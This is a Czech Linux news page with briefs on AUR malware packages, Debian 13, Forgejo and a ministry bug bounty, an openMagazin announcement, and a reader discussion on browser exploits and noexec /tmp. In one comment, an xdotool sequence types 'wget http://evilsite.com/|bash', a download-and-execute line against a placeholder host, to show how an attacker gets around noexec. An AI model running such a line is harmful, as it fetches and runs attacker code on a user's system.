V repozitáři AUR (Arch User Repository) linuxové distribuce Arch Linux byly nalezeny a odstraněny tři balíčky s malwarem. Jedná se o librewolf-fix-bin, firefox-patch-bin a zen-browser-patched-bin.
Dle plánu by Debian 13 s kódovým názvem Trixie měl vyjít v sobotu 9. srpna.
Vývoj linuxové distribuce Clear Linux (Wikipedie) vyvíjené společností Intel a optimalizováné pro jejich procesory byl oficiálně ukončen.
Byl publikován aktuální přehled vývoje renderovacího jádra webového prohlížeče Servo (Wikipedie).
V programovacím jazyce Go naprogramovaná webová aplikace pro spolupráci na zdrojových kódech pomocí gitu Forgejo byla vydána ve verzi 12.0 (Mastodon). Forgejo je fork Gitei.
Nová čísla časopisů od nakladatelství Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 155 (pdf) a Hello World 27 (pdf).
Hyprland, tj. kompozitor pro Wayland zaměřený na dláždění okny a zároveň grafické efekty, byl vydán ve verzi 0.50.0. Podrobný přehled novinek na GitHubu.
Patrick Volkerding oznámil před dvaatřiceti lety vydání Slackware Linuxu 1.00. Slackware Linux byl tenkrát k dispozici na 3,5 palcových disketách. Základní systém byl na 13 disketách. Kdo chtěl grafiku, potřeboval dalších 11 disket. Slackware Linux 1.00 byl postaven na Linuxu .99pl11 Alpha, libc 4.4.1, g++ 2.4.5 a XFree86 1.3.
Ministerstvo pro místní rozvoj (MMR) jako první orgán státní správy v Česku spustilo takzvaný „bug bounty“ program pro odhalování bezpečnostních rizik a zranitelných míst ve svých informačních systémech. Za nalezení kritické zranitelnosti nabízí veřejnosti odměnu 1000 eur, v případě vysoké závažnosti je to 500 eur. Program se inspiruje přístupy běžnými v komerčním sektoru nebo ve veřejné sféře v zahraničí.
Vláda dne 16. července 2025 schválila návrh nového jednotného vizuálního stylu státní správy. Vytvořilo jej na základě veřejné soutěže studio Najbrt. Náklady na přípravu návrhu a metodiky činily tři miliony korun. Modernizovaný dvouocasý lev vychází z malého státního znaku. Vizuální styl doprovází originální písmo Czechia Sans.
Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje. Pak si můžete udělat přehled a např. si nainstalovat některou z distribucí Linuxu.
Hned v prvním článku tématického okruhu se dozvíte, co je to linuxová distribuce a které jsou oblíbené. V dalších článcích jsou rozebírána jednotlivá desktopová prostředí, jejich výhody a nevýhody.
OpenMagazin (můžete si ho stáhnout) vám ukáže, že Evropa se přiklání k open-source softwaru. I v České republice se najde mnoho škol, které ho používají. Začtěte se do článku o jedné z nich. Recenze na hru Minecraft vás naláká k využití chvil odpočinku právě s ní.
Děkujeme všem, kteří kopírují, sdílejí a rozesílají e-zin všem svým známým a přátelům. Lidé z Liberixu ho vytvářejí pro vás, čtenáře, a také díky vašim darům může vycházet.
Tiskni
Sdílej:
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
mrkva@destiny:~$ cd /tmp mrkva@destiny:/tmp$ su Heslo: root@destiny:/tmp# mkdir noexec root@destiny:/tmp# chmod 777 noexec/ root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec root@destiny:/tmp# exit mrkva@destiny:/tmp$ cd noexec mrkva@destiny:/tmp/noexec$ cp /usr/bin/id . mrkva@destiny:/tmp/noexec$ ./id bash: ./id: Permission denied mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id ./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
.bashrc
. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.Zajimalo by mne, co na to SELinux.
xdotool key Alt-F2 xdotool type xterm [RETURN] xdotool type "wget http://evilsite.com/|bash - ; logout"
I invoke.Tak takhle jsem se dlouho nenasmál
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
Flash? Java?Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.